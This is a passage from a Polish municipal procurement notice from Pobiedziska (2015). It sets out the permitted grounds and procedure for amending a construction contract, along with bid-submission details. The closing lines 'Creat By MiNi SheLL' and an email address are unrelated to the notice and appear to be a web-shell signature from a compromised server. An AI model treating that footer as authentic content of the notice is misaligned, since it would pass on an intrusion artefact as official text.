b)	pojawienie się nowszej technologii wykonania robót pozwalającej na zaoszczędzenie czasu realizacji Umowy lub jego kosztów, jak również kosztów eksploatacji wykonanego obiektu;
c)	konieczność zrealizowania zakresu technicznego obiektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż  przewidzianych w SIWZ w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem robót;
d)	odmienne od przyjętych w dokumentacji projektowej warunki gruntowe (kategorie gruntu, kurzawka, itp.) lub istnienie nie zinwentaryzowanych (nie ujętych w dokumentacji) urządzeń, instalacji lub obiektów, skutkujące niemożliwością zrealizowania Przedmiotu Umowy przy dotychczasowych założeniach technologicznych;
e)	konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
6.	Pozostałe zmiany:
a)	siła wyższa uniemożliwiająca wykonanie umowy zgodnie z SIWZ;
b)	nieprzewidziane, wyjątkowo niekorzystne warunki atmosferyczne, a także inne przeszkody uniemożliwiające kontynuowanie umowy na przewidzianych w niej warunkach, w tym zagrażających wykonaniem zamówienia z wadą;
c)	protesty ludności;
d)	rezygnacja przez Zamawiającego z realizacji części robót. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie obniżone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z Umowy planowanymi świadczeniami, według Umowy,
e)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w Umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji lub usunięcia powstałej już kolizji;
f)	konieczność przedłużenia terminu realizacji Umowy w przypadku zaistnienia okoliczności niezależnych od Stron, których nie można było przewidzieć w chwili zawierania Umowy, zwłaszcza w przypadku wystąpienia potrzeby realizacji robót dodatkowych;
g)	zmiany wynagrodzenia Wykonawcy spowodowane zmianą stawki VAT;
h)	zmiana sposobu, warunków lub terminów płatności określonych w Umowie w przypadku zmiany zasad finansowania inwestycji przez Zamawiającego skutkującej koniecznością lub możliwością dokonania przedmiotowych zmian w Umowie;
i)	Wprowadzenie podwykonawcy (w sytuacji, gdy wykonawca w ofercie zadeklarował realizację siłami własnymi) za wyraźną pisemną zgodą Zamawiającego oraz na warunkach określonych w SIWZ.
7.	Wszystkie postanowienia określone w niniejszym § mogą stanowić  katalog zmian, na które Zamawiający może wyrazić zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i Wykonawcę.
8.	Każda taka zmiana wprowadzona będzie w trybach i procedurach opisanych w Umowie.
9.	Nie stanowi zmiany Umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego);
b)	zmiany danych teleadresowych, zmiany osób wskazanych do wykonywania zakresu umowy lub kontaktów między Stronami;
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych;
d)	udzielenie zamówień uzupełniających określonych w przepisach o zamówieniach publicznych.
10.	Nie stanowi podstawy do zmiany wynagrodzenia Wykonawcy zmiana czynników cenotwórczych dla materiałów, urządzeń, energii i paliw, użytych do realizacji Umowy oraz zmiana stawek ustawowych elementów składowych wynagrodzenia pracowników.
11.	W przypadku konieczności wprowadzenia zmian w terminie realizacji zamówienia nowy termin zostanie wydłużony o czas niezawinionego przez Wykonawcę przestoju. Warunkiem wydłużenia terminu realizacji Umowy będzie wystąpienie przez Wykonawcę z pisemnym wnioskiem o przedłużenie terminu realizacji zamówienia wraz ze wskazaniem przyczyn uzasadniających jego przedłużenie. W takim przypadku Zamawiający pisemnie potwierdzi fakt okresu przestoju, co stanowić będzie podstawę do spisania stosownego aneksu przedłużającego termin realizacji Umowy.
12.	Wykonawca robót budowlanych przed przystąpieniem do wprowadzenia jakichkolwiek zmian w stosunku do zatwierdzonej dokumentacji w szczególności co do projektu, kosztorysu bądź STWiOR musi uzyskać bezwarunkową pisemną zgodę Zamawiającego.
13.	Określa się następujący tryb dokonywania zmian postanowień Umowy: Sposób inicjowania zmian:
a)	Zamawiający: wnioskuje pisemnie do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany.
b)	Wykonawca: wnioskuje pisemnie do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany.
14.	Przyczyny dokonania zmian postanowień Umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach - notatka służbowa, pismo Wykonawcy, protokół konieczności, itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pobiedziska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Pobiedziska
ul. Kościuszki 4
62-010 Pobiedziska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2015 godzina 12:00, miejsce: Urząd Miasta i Gminy Pobiedziska
ul. Kościuszki 4
62-010 Pobiedziska
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com